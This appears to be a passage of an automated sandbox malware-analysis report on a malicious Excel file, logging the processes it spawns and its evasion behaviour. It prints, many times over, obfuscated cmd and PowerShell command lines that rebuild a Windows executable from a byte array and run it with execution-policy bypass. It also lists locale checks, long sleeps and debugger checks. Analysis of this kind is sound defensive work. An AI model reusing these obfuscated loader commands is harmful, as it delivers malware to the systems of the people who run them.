Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )Jump to behavior
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Document contains an embedded VBA which only executes on specific systems (country or language check)Show sources
Source: 7362_8164_(2019.2).xlsStream path '_VBA_PROJECT_CUR/VBA/Sheet1' : Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2360Thread sleep time: -922337203685477s >= -30000sJump to behavior
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformationJump to behavior
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
